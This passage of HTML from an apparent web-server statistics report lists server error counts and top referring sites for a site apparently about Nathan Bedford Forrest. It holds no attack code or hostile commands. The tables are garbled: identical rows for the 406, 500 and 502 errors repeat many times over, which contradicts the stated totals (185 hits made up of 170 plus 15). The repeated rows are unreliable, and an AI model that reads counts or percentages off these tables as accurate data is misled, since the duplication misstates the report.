<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>406 Incomplete / Undefined </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>4</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>0.11%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>406 Incomplete / Undefined </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>4</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>0.11%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>406 Incomplete / Undefined </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>4</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>0.11%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>406 Incomplete / Undefined </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>4</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>0.11%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>3500</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>100%</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopServerErrors"><!--Technical Statistics::Server Errors--></A>
<!-- WT_H1>Server Errors</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Server Errors</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies by type the errors which occurred on the server.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index17.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=3 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>3, 4, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Server Errors</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Server Errors</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Error</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total</B></CENTER></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>500 Internal Error </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>170</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>91.89%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>500 Internal Error </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>170</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>91.89%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>500 Internal Error </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>170</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>91.89%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>500 Internal Error </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>170</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>91.89%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>500 Internal Error </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>170</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>91.89%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>500 Internal Error </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>170</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>91.89%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>500 Internal Error </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>170</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>91.89%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>500 Internal Error </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>170</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>91.89%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>500 Internal Error </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>170</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>91.89%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>500 Internal Error </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>170</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>91.89%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>502 Temporarily Overloaded </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>15</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>8.1%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>502 Temporarily Overloaded </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>15</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>8.1%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>502 Temporarily Overloaded </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>15</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>8.1%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>502 Temporarily Overloaded </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>15</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>8.1%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>502 Temporarily Overloaded </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>15</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>8.1%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>502 Temporarily Overloaded </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>15</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>8.1%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>502 Temporarily Overloaded </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>15</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>8.1%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>502 Temporarily Overloaded </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>15</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>8.1%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>502 Temporarily Overloaded </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>15</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>8.1%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>502 Temporarily Overloaded </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>15</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>8.1%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>185</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>100%</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopReferingSites"><!--Referrers & Keywords::Top Referring Sites--></A>
<!-- WT_H1>Top Referring Sites</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Top Referring Sites</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the domain names or numeric IP addresses with links to the site. This information will only be displayed if your server is logging this information.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index18.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=3 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>3, .3, 4.7, 1</WT_TABLE_STATS -->
<CENTER><B>Top Referring Sites</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Top Referring Sites</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Site</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="No Referrer">No Referrer</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4647</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/">http://nbforrest.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2424</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.freebank.com/">http://www.freebank.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">933</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://billslater.com/">http://billslater.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">831</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.google.com/">http://www.google.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">461</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.billslater.com/">http://www.billslater.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">200</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://members.aol.com/">http://members.aol.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">117</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.forrestmonument.org/">http://www.forrestmonument.org/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">117</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://google.yahoo.com/">http://google.yahoo.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">102</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://search.msn.com/">http://search.msn.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">95</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://pub32.ezboard.com/">http://pub32.ezboard.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">57</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://forums.somethingawful.com/">http://forums.somethingawful.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">54</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://aolsearch.aol.com/">http://aolsearch.aol.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">52</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://roadsidegeorgia.com/">http://roadsidegeorgia.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">45</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://images.google.com/">http://images.google.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">41</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">16</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://tennessee-scv.org/">http://tennessee-scv.org/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">37</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">17</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://search.dogpile.com/">http://search.dogpile.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">36</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">18</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://auto.search.msn.com/">http://auto.search.msn.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">36</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">19</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://random.yahoo.com/">http://random.yahoo.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">32</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">20</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://navigation.helper.realnames.com/">http://navigation.helper.realnames.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">27</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD> </TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sub Total for the Referring Sites Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10344</B></TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total for the Log File</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>10898</B></TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopReferers"><!--Referrers & Keywords::Top Referring URLs--></A>
<!-- WT_H1>Top Referring URLs</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Top Referring URLs</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section provides the full URLs of the sites with links to the site. This information will only be displayed if your server is logging the referrer information.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index19.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=3 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>3, .3, 4.7, 1</WT_TABLE_STATS -->
